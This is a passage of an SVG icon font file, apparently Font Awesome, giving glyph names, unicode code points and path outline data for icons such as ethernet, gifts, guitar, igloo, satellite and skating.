d="M418.7 343.9c-19.7002 -17.6006 -37.7002 -36.5 -53.9004 -55.8008h-60.7998v128h100.5l14.4004 -72zM272 416v-128h-126.1l25.5996 128h100.5zM461.3 343.9l-11.8994 10.5996l-12.3008 61.5h98.9004c7.2998 0 13.7002 -5 15.4004 -12.0996l24 -96
c0.199219 -0.800781 -0.100586 -1.5 0 -2.30078c-1 1 -2 2.2002 -3.10059 3.10059l-21.2998 19l-21.2998 -19c-5.90039 -5.2002 -11.6006 -10.7002 -17.2998 -16.2998c-15.6006 17.7998 -32.9004 35.1992 -51.1006 51.5zM16 288c-10.4004 0 -18 9.7998 -15.5 19.9004l24 96
c1.7998 7.09961 8.2002 12.0996 15.5 12.0996h98.9004l-25.6006 -128h-97.2998zM340.6 256c-32.6992 -46.7002 -52.5996 -93.7002 -52.5996 -129.6c0 -48.5 18.5996 -92.7002 48.7998 -126.4h-208.8v-16c0 -8.7998 -7.2002 -16 -16 -16h-32c-8.7998 0 -16 7.2002 -16 16v16
l-20 160h-28c-8.7998 0 -16 7.2002 -16 16v32c0 8.7998 7.2002 16 16 16h20l-4 32h308.6zM551.1 284.8c51.8008 -46.2002 88.9004 -121.8 88.8008 -158.399c0 -87.5 -71.6006 -158.4 -160 -158.4c-88.4004 0 -160 70.9004 -160 158.4c0 49.2998 49.7998 130.899 120 193.6
c27.3994 -24.4004 51.5 -50.5996 71 -76.4004c11.8994 14 25.2998 27.9004 40.1992 41.2002zM532.5 55.4004c33.4004 24.1992 41.2002 71.0996 22.5996 107.8c-2.2998 4.5 -4.89941 9.2002 -7.69922 14l-39.8008 -47s-62.3994 82.5 -67.0996 88.0996
c-32.9004 -40.8994 -49.4004 -64.7998 -49.4004 -91.8994c0 -54.5 39.9004 -88 88.9004 -88c19.5996 0 37.7998 6.2998 52.5 17z" />
    <glyph glyph-name="ethernet" unicode="&#xf796;" 
d="M496 256c8.7998 0 16 -7.2002 16 -16v-224c0 -8.7998 -7.2002 -16 -16 -16h-80v128h-32v-128h-64v128h-32v-128h-64v128h-32v-128h-64v128h-32v-128h-80c-8.7998 0 -16 7.2002 -16 16v224c0 8.7998 7.2002 16 16 16h48v48c0 8.7998 7.2002 16 16 16h48v48
c0 8.7998 7.2002 16 16 16h224c8.7998 0 16 -7.2002 16 -16v-48h48c8.7998 0 16 -7.2002 16 -16v-48h48z" />
    <glyph glyph-name="gifts" unicode="&#xf79c;" horiz-adv-x="640" 
d="M240.6 253.9c-27.7998 -6.90039 -48.5996 -32 -48.5996 -61.9004v-224c0 -11.7002 3.40039 -22.5 8.90039 -32h-168.9c-17.7002 0 -32 14.2998 -32 32v352c0 17.7002 14.2998 32 32 32h29.4004l-30.7002 22c-7.2002 5.09961 -8.7998 15.0996 -3.7002 22.2998l9.2998 13
c5.10059 7.2002 15.1006 8.7998 22.2998 3.7002l32.1006 -22.7998l-11.5 30.5996c-3.2002 8.2002 1 17.5 9.2998 20.6006l15 5.59961c8.2998 3.09961 17.5 -1.09961 20.5996 -9.40039l19.9004 -53.0996l19.9004 53c3.09961 8.2998 12.2998 12.5 20.5996 9.40039l15 -5.60059
c8.2998 -3.09961 12.5 -12.2998 9.40039 -20.5996l-11.5 -30.6006l32 22.9004c7.19922 5.2002 17.1992 3.5 22.2998 -3.7002l9.2998 -13c5.2002 -7.2002 3.5 -17.2002 -3.7002 -22.2998l-30.7002 -22h29.4004c12.7002 0 23.4004 -7.5 28.5996 -18.2998
c-26.6992 -18.6006 -42.0996 -49 -44 -79.7998zM224 -32v96h192v-128h-160c-17.7002 0 -32 14.2998 -32 32zM448 -64v128h192v-96c0 -17.7002 -14.2998 -32 -32 -32h-160zM608 224c17.7002 0 32 -14.2998 32 -32v-96h-192v128h-15.2998l-0.700195 0.200195
l-0.700195 -0.200195h-15.2998v-128h-192v96c0 17.7002 14.2998 32 32 32h20.4004c-2.7002 7.59961 -4.40039 15.5 -4.40039 23.7998c0 35.5 27 72.2002 72.0996 72.2002c48 0 75.8008 -47.7002 87.9004 -75.2998c12 27.5996 39.7998 75.2998 87.9004 75.2998
c45.0996 0 72.0996 -36.7002 72.0996 -72.2002c0 -8.2998 -1.7998 -16.2002 -4.40039 -23.7998h20.4004zM336 224h52.5996c-8.89941 20.5996 -25.7998 48 -44.5 48c-17.6992 0 -24.0996 -14.5 -24.0996 -24.2002c0 -5.2002 1.5 -12.5996 8.7998 -19
c2.10059 -1.7998 4.5 -3.39941 7.2002 -4.7998zM535.2 228.8c7.2998 6.40039 8.7998 13.7998 8.7998 19c0 9.7002 -6.40039 24.2002 -24.0996 24.2002c-18.7002 0 -35.7002 -27.7002 -44.5 -48h52.5996c2.7002 1.40039 5.09961 3 7.2002 4.7998z" />
    <glyph glyph-name="glass-cheers" unicode="&#xf79f;" horiz-adv-x="640" 
d="M639.4 14.4004c1.69922 -4.10059 -0.300781 -8.7002 -4.30078 -10.4004l-162.399 -67.4004c-4 -1.69922 -8.7002 0.200195 -10.4004 4.30078c-8.5 20.3994 1.2002 43.7998 21.6006 52.2998l22.0996 9.2002l-39.2998 103.6
c-4.40039 -0.5 -8.7998 -1.2998 -13.1006 -1.2998c-51.6992 0 -99.3994 33.0996 -113.399 85.2998l-20.2002 75.4004l-20.2002 -75.4004c-14 -52.2002 -61.7002 -85.2998 -113.399 -85.2998c-4.30078 0 -8.7002 0.799805 -13.1006 1.2998l-39.3994 -103.6l22.0996 -9.2002
c20.4004 -8.5 30 -31.9004 21.5996 -52.2998c-1.69922 -4.10059 -6.2998 -6 -10.3994 -4.30078l-162.3 67.4004c-4.10059 1.7002 -6 6.40039 -4.30078 10.5c8.5 20.4004 31.8008 30.0996 52.2002 21.5996l22.1006 -9.19922l38.6992 101.899
c-47.8994 34.9004 -64.6992 100.2 -34.5 152.7l86.6006 150.5c8 13.9004 25.0996 19.7998 40 13.5996l114.3 -47.3994l114.3 47.3994c14.9004 6.10059 32 0.300781 40 -13.5996l86.6006 -150.5c30.2998 -52.5 13.3994 -117.8 -34.5 -152.8l38.6992 -101.9l22.1006 9.2002
c20.3994 8.5 43.7998 -1.2002 52.2002 -21.5996zM275.9 285.9l18.8994 70.6992l-94.5 39.2002l-36.5 -63.3994zM364.1 285.9l112.101 46.5l-36.5 63.3994l-94.5 -39.2002z" />
    <glyph glyph-name="glass-whiskey" unicode="&#xf7a0;" 
d="M480 416c19.5 0 34.4004 -17.2002 31.7002 -36.5l-55.6006 -356.5c-4.5 -31.5 -31.5996 -54.9004 -63.3994 -54.9004h-273c-31.9004 0 -58.9004 23.4004 -63.4004 54.9004l-56 356.5c-2.7002 19.2998 12.2002 36.5 31.7002 36.5h448zM442.6 352h-373.199l30.1992 -192
h313z" />
    <glyph glyph-name="globe-europe" unicode="&#xf7a2;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM448 192c0 110.3 -89.7002 200 -200.2 200c-1.89941 0 -3.7998 -0.200195 -5.7002 -0.299805l-28.8994 -21.7002c-2 -1.5 -3.2002 -3.90039 -3.2002 -6.40039v-20
c0 -4.39941 3.59961 -8 8 -8h16c4.40039 0 8 3.60059 8 8v8l16 16h20.7002c6.2002 0 11.2998 -5.09961 11.2998 -11.2998c0 -3 -1.2002 -5.89941 -3.2998 -8l-26.7998 -26.7998c-1.2002 -1.2002 -2.7002 -2.09961 -4.40039 -2.7002l-40 -13.2998
c-3.2998 -1.09961 -5.5 -4.2002 -5.5 -7.59961c0 -6.60059 -2.59961 -12.9004 -7.2002 -17.5l-20.0996 -20.1006c-3 -3 -4.7002 -7.09961 -4.7002 -11.2998v-25.2998c0 -8.7998 7.2002 -16 16 -16h22.0996c6.10059 0 11.6006 3.39941 14.3008 8.7998l9.39941 18.7002
c1.40039 2.7002 4.2002 4.39941 7.2002 4.39941h3.09961c4.40039 0 8 -3.59961 8 -8c0 -4.39941 3.60059 -8 8 -8h16c4.40039 0 8 3.60059 8 8v2.2002c0 3.5 2.2002 6.5 5.5 7.60059l31.6006 10.5c6.5 2.19922 10.8994 8.2998 10.8994 15.1992v4.5
c0 8.80078 7.2002 16 16 16h36.7002c6.2002 0 11.2998 -5.09961 11.2998 -11.2998v-9.39941c0 -6.2002 -5.09961 -11.3008 -11.2998 -11.3008h-32c-3 0 -5.89941 -1.19922 -8 -3.2998l-9.39941 -9.39941c-2.10059 -2.10059 -3.30078 -5 -3.30078 -8
c0 -6.2002 5.10059 -11.3008 11.3008 -11.3008h16c3 0 5.89941 -1.19922 8 -3.2998l9.39941 -9.39941c2.10059 -2.10059 3.2998 -5 3.2998 -8v-8.7002l-12.5 -12.5c-4.59961 -4.60059 -4.59961 -12.1006 -0.0996094 -16.7002l32 -32.5996
c3 -3.10059 7.09961 -4.80078 11.4004 -4.80078h20.2998c6.89941 20.2002 10.7998 41.9004 10.7998 64.4004zM130.1 298.9c0 -6.2002 5.10059 -11.3008 11.3008 -11.3008h16c3 0 5.89941 1.2002 8 3.30078l9.39941 9.39941c2.10059 2.10059 3.2998 5 3.2998 8v16
c0 6.2002 -5.09961 11.2998 -11.2998 11.2998c-3 0 -5.89941 -1.19922 -8 -3.2998l-25.3994 -25.3994c-2.10059 -2.10059 -3.30078 -5 -3.30078 -8zM258.1 -7.5c71.1006 3.59961 132.5 44.2002 164.9 103.1h-13.4004c-4.7998 0 -9.5 1.90039 -12.8994 5.30078
l-17.2998 17.2998c-6 6 -14.1006 9.39941 -22.6006 9.39941h-18.2998l-43.2002 37.1006c-8.2002 7 -18.7002 10.8994 -29.5996 10.8994h-31.2002c-8.2002 0 -16.2998 -2.2998 -23.4004 -6.5l-42.8994 -25.6992c-13.7002 -8.2002 -22.1006 -23 -22.1006 -39v-23.9004
c0 -14.2998 6.7002 -27.7998 18.2002 -36.4004l22.2002 -16.6992c8.7002 -6.5 24.5996 -11.8008 35.4004 -11.8008h20.1992c8.80078 0 16 -7.19922 16 -16v-7.09961z" />
    <glyph glyph-name="grip-lines" unicode="&#xf7a4;" 
d="M496 160c8.7998 0 16 -7.2002 16 -16v-32c0 -8.7998 -7.2002 -16 -16 -16h-480c-8.7998 0 -16 7.2002 -16 16v32c0 8.7998 7.2002 16 16 16h480zM496 288c8.7998 0 16 -7.2002 16 -16v-32c0 -8.7998 -7.2002 -16 -16 -16h-480c-8.7998 0 -16 7.2002 -16 16v32
c0 8.7998 7.2002 16 16 16h480z" />
    <glyph glyph-name="grip-lines-vertical" unicode="&#xf7a5;" horiz-adv-x="256" 
d="M96 -48c0 -8.7998 -7.2002 -16 -16 -16h-32c-8.7998 0 -16 7.2002 -16 16v480c0 8.7998 7.2002 16 16 16h32c8.7998 0 16 -7.2002 16 -16v-480zM224 -48c0 -8.7998 -7.2002 -16 -16 -16h-32c-8.7998 0 -16 7.2002 -16 16v480c0 8.7998 7.2002 16 16 16h32
c8.7998 0 16 -7.2002 16 -16v-480z" />
    <glyph glyph-name="guitar" unicode="&#xf7a6;" horiz-adv-x="511" 
d="M502.6 393.4c12.5 -12.5 12.5 -32.8008 0.100586 -45.2002l-67.9004 -67.9004c-12.5 -12.5 -32.7998 -12.5 -45.2998 0l-54.2002 -54.2002c28.9004 -45.3994 28.9004 -100.399 -4.2002 -133.5c-9.69922 -9.69922 -21.1992 -16.3994 -33.8994 -20.5
c-18.7998 -6.09961 -33.1006 -23.5996 -34.9004 -42.6992c-2.2998 -24.1006 -11.5996 -46.4004 -28.7998 -63.5c-46.0996 -46.1006 -129.1 -37.9004 -185.3 18.2998s-64.5 139.2 -18.2998 185.3c17.0996 17.2002 39.3994 26.5 63.3994 28.7998
c19.2002 1.7998 36.6006 16.1006 42.7002 34.9004c4.09961 12.7002 10.7998 24.2002 20.5 33.8994c33.0996 33.1006 88.0996 33.2002 133.5 4.2002l54.2002 54.1006c-12.5 12.5 -12.5 32.7998 0 45.2998l67.8994 67.8994c12.5 12.5 32.8008 12.5 45.3008 0zM208 96
c26.5 0 48 21.5 48 48s-21.5 48 -48 48s-48 -21.5 -48 -48s21.5 -48 48 -48z" />
    <glyph glyph-name="heart-broken" unicode="&#xf7a9;" 
d="M473.7 374.2c48.7002 -49.7998 50.7998 -129.101 7.2998 -182.101l-212.2 -218.699c-7.09961 -7.30078 -18.5996 -7.30078 -25.7002 0l-212.1 218.6c-43.5 53.0996 -41.4004 132.4 7.2998 182.2l2.40039 2.39941c46.2998 47.4004 119 51.8008 170.7 14l28.5996 -86.5
l-96 -64l144 -144l-48 128l96 64l-34.2998 103.4c51.5996 36.9004 123.6 32.2002 169.6 -14.7998z" />
    <glyph glyph-name="holly-berry" unicode="&#xf7aa;" horiz-adv-x="447" 
d="M144 256c-26.5 0 -48 21.5 -48 48s21.5 48 48 48s48 -21.5 48 -48s-21.5 -48 -48 -48zM256 304c0 26.5 21.5 48 48 48s48 -21.5 48 -48s-21.5 -48 -48 -48s-48 21.5 -48 48zM224 352c-26.5 0 -48 21.5 -48 48s21.5 48 48 48s48 -21.5 48 -48s-21.5 -48 -48 -48z
M207.8 212.9c-0.399414 -39.8008 7.40039 -78.1006 22.9004 -112.301c4 -8.89941 -2 -19.1992 -11.7002 -20.1992c-15.2002 -1.5 -30.4004 -4.60059 -45.2998 -9.10059c-14.9004 -4.5 -23.7998 -19.8994 -20.2002 -35.0996s8.5 -29.9004 14.7002 -43.7998
c4 -8.90039 -1.90039 -19.3008 -11.6006 -20.2002c-35.8994 -3.40039 -71.5996 -14.9004 -104.8 -33.9004c-12.3994 -7.09961 -27.5 1.60059 -27.5996 16c-0.100586 38.2002 -8 74.9004 -23 107.7c-4 8.90039 2 19.2002 11.7002 20.2002
c15.1992 1.5 30.3994 4.59961 45.2998 9.09961c14.8994 4.5 23.7998 19.9004 20.2002 35.1006c-3.60059 15.1992 -8.5 29.8994 -14.7002 43.7998c-4 8.89941 1.89941 19.2998 11.5996 20.2002c37.2998 3.5 74.4004 15.8994 108.7 36.1992
c10.7002 6.40039 23.9004 -1.2998 23.7998 -13.6992zM435 82.4004c9.7002 -1 15.7998 -11.4004 11.5 -20.1006c-15 -32.7002 -22.7998 -69.5 -23 -107.7c0 -14.3994 -15.0996 -23.0996 -27.5996 -16c-33.2002 19 -68.9004 30.5 -104.801 33.9004
c-9.69922 0.900391 -15.5996 11.2998 -11.5996 20.2002c6.2002 14 11.0996 28.5996 14.7002 43.7998c3.59961 15.2002 -5.2998 30.5996 -20.2002 35.0996c-4.90039 1.5 -9.90039 2.5 -14.7998 3.7002c5.7998 12.2998 6.2998 26.5 0.599609 38.9004
c-12.8994 28.2998 -19.7002 60.7002 -19.8994 94c0 1.7002 0.199219 3.2998 0.199219 4.89941c-0.0996094 12.3008 13.1006 20 23.8008 13.7002c34.2998 -20.2998 71.3994 -32.7002 108.699 -36.2002c9.7002 -0.899414 15.6006 -11.2998 11.6006 -20.1992
c-6.2002 -14 -11.1006 -28.6006 -14.7002 -43.8008c-3.59961 -15.1992 5.2998 -30.5996 20.2002 -35.0996c15 -4.40039 30.0996 -7.5 45.2998 -9.09961z" />
    <glyph glyph-name="horse-head" unicode="&#xf7ab;" horiz-adv-x="511" 
d="M509.8 115.5c4.60059 -11.7998 1.7998 -25.2998 -7.09961 -34.4004l-45.2998 -39.7998c-6 -6 -14.1006 -9.39941 -22.6006 -9.39941h-50.2998c-10.2998 0 -20 4.89941 -26 13.2998l-46 63.8994c-13.7998 -8.09961 -29.5996 -13.1992 -46.7998 -13.1992
c-39.2002 0 -72.6006 23.6992 -87.4004 57.3994c-2.2998 5.10059 -9 6.2998 -12.8994 2.40039l-12.1006 -12.1006c-2.5 -2.39941 -3.2002 -6.19922 -1.59961 -9.2998c19.7002 -38.8994 58.7002 -66.0996 104.3 -69.5996v-0.700195l40.7998 -81.7002
c10.7002 -21.2998 -4.7998 -46.2998 -28.5996 -46.2998h-236.2c-17.7002 0 -32 14.2998 -32 32v81.2002c0 159.899 35.9004 275.399 166.9 322.5l202.199 75.7002c4.90039 1.7998 10.7002 -1.10059 12 -6.10059c12.1006 -46.3994 -16.1992 -71.7002 -34.1992 -82.2998
c42.5996 -8.2002 78.0996 -38 93 -79.2002zM328 224c13.2998 0 24 10.7002 24 24s-10.7002 24 -24 24s-24 -10.7002 -24 -24s10.7002 -24 24 -24z" />
    <glyph glyph-name="icicles" unicode="&#xf7ad;" horiz-adv-x="511" 
d="M511.4 410.1l-87.5 -467.699c-1.7002 -8.60059 -14 -8.60059 -15.7002 0l-66.7002 363.8l-45.7998 -172.5c-2.2998 -7.60059 -13 -7.60059 -15.2998 0l-34.1006 133.399l-46.5 -196.899c-1.89941 -8.2998 -13.7002 -8.2998 -15.5996 0l-44.2002 187.3l-36.4004 -124.1
c-2.39941 -7.2002 -12.5996 -7.2002 -15.0996 0l-87.0996 273.399c-6.2002 20.5 9.19922 41.2002 30.5996 41.2002h448c20 0 35.0996 -18.2002 31.4004 -37.9004z" />
    <glyph glyph-name="igloo" unicode="&#xf7ae;" horiz-adv-x="576" 
d="M320 414.1v-126.1h-271.4c51.6006 77.2002 139.601 128 239.4 128c10.7998 0 21.5 -0.700195 32 -1.90039zM96 256v-128h-96c0 46 11.0996 89.4004 30.2998 128h65.7002zM352 408.6c72.7998 -16.5 135.2 -60.5 175.4 -120.6h-175.4v120.6zM480 128v128h65.7002
c19.2002 -38.5996 30.2998 -82 30.2998 -128h-96zM416 64c0 11.0996 -1.90039 21.7002 -4.5 32h164.5v-96c0 -17.7002 -14.2998 -32 -32 -32h-128v96zM448 256v-128h-49.7998c-22.2002 38.0996 -63 64 -110.2 64s-88 -25.9004 -110.2 -64h-49.7998v128h320zM0 0v96h164.5
c-2.59961 -10.2998 -4.5 -20.9004 -4.5 -32v-96h-128c-17.7002 0 -32 14.2998 -32 32zM288 160c53 0 96 -43 96 -96v-96h-192v96c0 53 43 96 96 96z" />
    <glyph glyph-name="mitten" unicode="&#xf7b5;" horiz-adv-x="448" 
d="M368 32c8.7998 0 16 -7.2002 16 -16v-64c0 -8.7998 -7.2002 -16 -16 -16h-320c-8.7998 0 -16 7.2002 -16 16v64c0 8.7998 7.2002 16 16 16h320zM425 241.1c27.0996 -22.5996 30.7998 -62.8994 8.09961 -90.0996l-72.5 -87h-309l-47.8994 207.6
c-17.9004 77.5 30.5 154.801 107.899 172.7c77.4004 17.9004 154.801 -30.5 172.801 -108l29.5996 -128.399l20.9004 25c22.5996 27.1992 62.8994 30.7998 90.0996 8.19922z" />
    <glyph glyph-name="mug-hot" unicode="&#xf7b6;" 
d="M127.1 301.5c-2.69922 16.5996 -10.3994 31.9004 -22.3994 44.0996c-22.6006 23.1006 -36.7002 52.5 -40.6006 84.4004c-1.09961 9.5 6.5 18 16.3008 18h16.3994c8.2002 0 15 -5.90039 16.1006 -13.7998c2.7998 -20.2002 12 -38.7998 26.3994 -53.5
c20.2002 -20.5 32.7998 -46.5 36.6006 -74.7002c1.2998 -9.5 -6.5 -18 -16.3008 -18h-16.5c-8 0 -14.6992 5.7998 -16 13.5zM239.1 301.5c-2.69922 16.5996 -10.3994 31.9004 -22.3994 44.0996c-22.6006 23.1006 -36.7002 52.5 -40.6006 84.4004
c-1.19922 9.5 6.5 18 16.3008 18h16.3994c8.2002 0 15 -5.90039 16.1006 -13.7998c2.7998 -20.2002 12 -38.7998 26.3994 -53.5c20.2002 -20.5 32.7998 -46.5 36.6006 -74.7002c1.2998 -9.5 -6.5 -18 -16.3008 -18h-16.5c-8 0 -14.6992 5.7998 -16 13.5zM400 256
c61.7998 0 112 -50.2002 112 -112s-50.2002 -112 -112 -112h-16c0 -53 -43 -96 -96 -96h-192c-53 0 -96 43 -96 96v192c0 17.7002 14.2998 32 32 32h368zM400 96c26.5 0 48 21.5 48 48s-21.5 48 -48 48h-16v-96h16z" />
    <glyph glyph-name="radiation" unicode="&#xf7b9;" horiz-adv-x="496" 
d="M167.8 191.8c0 -28.5996 15.2002 -53.5 37.7998 -67.7998l-80.3994 -128.4c-4.7998 -7.69922 -15.2998 -10.0996 -22.7002 -4.7998c-58.0996 42 -97.4004 108.4 -102.5 184.2c-0.599609 9.09961 7.09961 16.7998 16.2002 16.7998h151.6zM205.6 259.5l-80.3994 128.5
c-4.7998 7.59961 -2.40039 18.0996 5.59961 22.4004c34.9004 18.7998 74.7998 29.5996 117.2 29.5996s82.2998 -10.7998 117.2 -29.5996c8 -4.30078 10.3994 -14.7002 5.59961 -22.4004l-80.3994 -128.5c-12.4004 7.7002 -26.8008 12.4004 -42.4004 12.4004
s-30.0996 -4.7002 -42.4004 -12.4004zM248 239.8c26.5 0 48 -21.5 48 -48s-21.5 -48 -48 -48s-48 21.5 -48 48s21.5 48 48 48zM479.8 191.8c9.10059 0 16.7998 -7.7002 16.2002 -16.7002c-5.09961 -75.7998 -44.4004 -142.199 -102.5 -184.199
c-7.40039 -5.40039 -17.9004 -2.90039 -22.7002 4.7998l-80.3994 128.399c22.5996 14.2002 37.7998 39.1006 37.7998 67.7002h151.6z" />
    <glyph glyph-name="radiation-alt" unicode="&#xf7ba;" horiz-adv-x="496" 
d="M184 192c0 -22.7998 12.0996 -42.7998 30.0996 -54l-41.6992 -66.7998c-5.2002 -8.2998 -16.4004 -9.90039 -24 -3.7998c-32.5 26 -54.9004 64.1992 -59.5 107.8c-0.900391 9.09961 6.7998 16.7998 16 16.7998h79.0996zM281.8 246.1
c-9.7998 6.2002 -21.5 9.90039 -33.8994 9.90039c-12.4004 0 -24 -3.7002 -33.8008 -9.90039l-41.7998 66.9004c-4.7998 7.7998 -2.39941 18.4004 5.7998 22.5c21.2002 10.4004 44.8008 16.5 69.9004 16.5s48.7002 -6.09961 69.7998 -16.5
c8.2002 -4.09961 10.7002 -14.7002 5.7998 -22.5zM391.1 192c9.2002 0 17 -7.7002 15.9004 -16.9004c-4.59961 -43.5996 -26.9004 -81.7998 -59.5 -107.8c-7.59961 -6.09961 -18.7998 -4.5 -24 3.7998l-41.7002 66.8008c18.1006 11.2998 30.2002 31.2998 30.2002 54.0996
h79.0996zM248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM248 8c101.5 0 184 82.5 184 184s-82.5 184 -184 184s-184 -82.5 -184 -184s82.5 -184 184 -184zM248 224c17.7002 0 32 -14.2998 32 -32s-14.2998 -32 -32 -32
s-32 14.2998 -32 32s14.2998 32 32 32z" />
    <glyph glyph-name="restroom" unicode="&#xf7bd;" horiz-adv-x="671" 
d="M128 320c-35.2998 0 -64 28.7002 -64 64s28.7002 64 64 64s64 -28.7002 64 -64s-28.7002 -64 -64 -64zM512 320c-35.2998 0 -64 28.7002 -64 64s28.7002 64 64 64s64 -28.7002 64 -64s-28.7002 -64 -64 -64zM639.3 93.5c3.7002 -15.0996 -8.2998 -29.5 -24.5 -29.5
h-54.7998v-104c0 -13.2998 -10.7002 -24 -24 -24h-48c-13.2998 0 -24 10.7002 -24 24v104h-54.7998c-16.2002 0 -28.2002 14.4004 -24.7002 29.5l45.5996 185.8c3.30078 13.5 15.5 23 29.8008 24.2002c15 -9.7002 32.7998 -15.5 52 -15.5c19.1992 0 37 5.7998 52 15.5
c14.2998 -1.2002 26.5 -10.7002 29.7998 -24.2002zM336 448c8.7998 0 16 -7.2002 16 -16v-480c0 -8.7998 -7.2002 -16 -16 -16h-32c-8.7998 0 -16 7.2002 -16 16v480c0 8.7998 7.2002 16 16 16h32zM180.1 303.6c24.6006 -2.09961 43.9004 -22.5 43.9004 -47.5996v-136
c0 -13.2998 -10.7002 -24 -24 -24h-8v-136c0 -13.2998 -10.7002 -24 -24 -24h-80c-13.2998 0 -24 10.7002 -24 24v136h-8c-13.2998 0 -24 10.7002 -24 24v136c0 25.0996 19.2998 45.5 43.9004 47.5996c15 -9.7998 32.8994 -15.5996 52.0996 -15.5996
s37.0996 5.7998 52.0996 15.5996z" />
    <glyph glyph-name="satellite" unicode="&#xf7bf;" 
d="M502.7 183c12.3994 -12.4004 12.3994 -32.5996 -0.100586 -45l-96.6992 -96.7002c-6.2002 -6.2002 -14.4004 -9.2998 -22.5 -9.2998c-8.10059 0 -16.3008 3.09961 -22.5 9.2998l-80.3008 80.4004l-9.89941 -9.90039c24.2998 -53.7002 22.7002 -116.2 -5.40039 -168.5
c-4.5 -8.5 -16.3994 -9.59961 -23.2002 -2.7998l-107.5 107.5l-17.7998 -17.7998c0.700195 -2.60059 1.60059 -5 1.60059 -7.7998c0 -17.7002 -14.3008 -32 -32 -32c-17.7002 0 -32 14.2998 -32 32c0 17.6992 14.2998 32 32 32c2.7998 0 5.19922 -0.900391 7.7998 -1.60059
l17.7998 17.7998l-107.5 107.5c-6.7998 6.80078 -5.7002 18.6006 2.7998 23.2002c52.2998 28.1006 114.8 29.7002 168.5 5.40039l9.7998 9.7998l-80.2998 80.4004c-12.3994 12.5 -12.3994 32.6992 0 45.0996l96.7002 96.7002c6.2002 6.2002 14.2998 9.2998 22.5 9.2998
s16.2998 -3.09961 22.5996 -9.2998l80.3008 -80.2998l47.7998 47.8994c13.0996 13.1006 34.3994 13.1006 47.5 0l47.5 -47.5c13.0996 -13.0996 13.0996 -34.3994 0 -47.5l-47.7998 -47.8994zM150.7 319.5l68.8994 -68.9004l73.8008 73.8008l-68.9004 68.8994zM383.5 86.7002
l73.7998 73.7998l-68.8994 68.9004l-73.8008 -73.8008z" />
    <glyph glyph-name="satellite-dish" unicode="&#xf7c0;" horiz-adv-x="511" 
d="M188.8 102.1l116.601 -116.6c7.39941 -7.2998 6.19922 -20.0996 -3 -25c-77.7002 -41.7998 -176.7 -29.9004 -242.301 35.7002c-65.5996 65.5996 -77.5 164.5 -35.6992 242.3c4.89941 9.09961 17.6992 10.2998 25 3l116.8 -116.8l27.3994 27.3994
c-0.699219 2.60059 -1.59961 5 -1.59961 7.80078c0 17.6992 14.2998 32 32 32s32 -14.3008 32 -32c0 -17.7002 -14.2998 -32 -32 -32c-2.7998 0 -5.2002 0.899414 -7.7998 1.59961zM209 448c163.2 -8.59961 294.4 -139.8 302.9 -303c0.5 -9.2002 -6.80078 -17 -16 -17
h-32.1006c-8.39941 0 -15.3994 6.59961 -15.8994 15c-7.5 129.5 -111.5 234.5 -240.9 241.5c-8.40039 0.400391 -15 7.40039 -15 15.9004v31.5996c0 9.2002 7.7998 16.5 17 16zM209.3 352c110.101 -8.5 198.2 -96.5996 206.601 -206.7
c0.699219 -9.2998 -6.80078 -17.2998 -16.1006 -17.2998h-32.2002c-8.2998 0 -15.0996 6.40039 -15.8994 14.7002c-6.90039 77 -68.1006 138.899 -144.9 145.2c-8.2998 0.599609 -14.7998 7.5 -14.7998 15.8994v32.1006c0 9.39941 8 16.7998 17.2998 16.0996z" />
    <glyph glyph-name="sd-card" unicode="&#xf7c2;" horiz-adv-x="384" 
d="M320 448c35.2998 0 64 -28.7002 64 -64v-384c0 -35.2998 -28.7002 -64 -64 -64h-256c-35.2998 0 -64 28.7002 -64 64v320l128 128h192zM160 288v96h-48v-96h48zM240 288v96h-48v-96h48zM320 288v96h-48v-96h48z" />
    <glyph glyph-name="sim-card" unicode="&#xf7c4;" horiz-adv-x="384" 
d="M320 448c35.2998 0 64 -28.7002 64 -64v-384c0 -35.2998 -28.7002 -64 -64 -64h-256c-35.2998 0 -64 28.7002 -64 64v320l128 128h192zM160 256v-64h64v64h-64zM64 224v-32h64v64h-32c-17.7002 0 -32 -14.2998 -32 -32zM128 0v64h-64v-32c0 -17.7002 14.2998 -32 32 -32
h32zM224 0v64h-64v-64h64zM320 32v32h-64v-64h32c17.7002 0 32 14.2998 32 32zM320 96v64h-256v-64h256zM320 192v32c0 17.7002 -14.2998 32 -32 32h-32v-64h64z" />
    <glyph glyph-name="skating" unicode="&#xf7c5;" horiz-adv-x="448" 
d="M400 448c26.5 0 48 -21.5 48 -48s-21.5 -48 -48 -48s-48 21.5 -48 48s21.5 48 48 48zM400 0c8.7998 0 16 -7.2002 16 -16c0 -26.5 -21.5 -48 -48 -48h-96c-8.7998 0 -16 7.2002 -16 16s7.2002 16 16 16h96c8.7998 0 16 7.2002 16 16s7.2002 16 16 16zM117.8 -8.59961
c6.2998 6.2998 16.5 6.19922 22.7002 0c6.2002 -6.2002 6.2002 -16.4004 0 -22.6006c-9.2998 -9.2998 -21.5996 -14 -33.9004 -14c-12.2998 0 -24.5996 4.60059 -34 14l-67.8994 67.9004c-6.2002 6.2002 -6.2002 16.3994 0 22.5996s16.3994 6.2002 22.5996 0
l67.9004 -67.8994c6.2002 -6.30078 16.3994 -6.2002 22.5996 0zM173.9 171.2c3.7998 -6.10059 8.19922 -11.7998 13.1992 -16.7998l30.2002 -30.2002l-91.8994 -91.9004c-6.2002 -6.2998 -14.4004 -9.39941 -22.6006 -9.39941s-16.3994 3.19922 -22.5996 9.39941
c-12.5 12.4004 -12.5 32.7002 0 45.2002zM128 288c-17.7002 0 -32 14.2998 -32 32s14.2998 32 32 32h204.6c16.3008 0 30.8008 -9.7002 37 -24.7002c6.2002 -15 2.80078 -32.0996 -8.69922 -43.5996l-82.3008 -82.2998c-0.5 -0.5 -1.19922 -0.700195 -1.69922 -1.10059
l61 -61c9 -8.89941 14.0996 -21.2998 14.0996 -33.8994v-89.4004c0 -17.7002 -14.2998 -32 -32 -32s-32 14.2998 -32 32v82.7998l-78.2002 78.2002c-12.5996 12.5 -19.3994 29.9004 -18.7002 47.7002c0.700195 17.7002 8.80078 34.5996 22.3008 46.0996l20.0996 17.2002
h-105.5z" />
    <glyph glyph-name="skiing" unicode="&#xf7c9;" horiz-adv-x="511" 
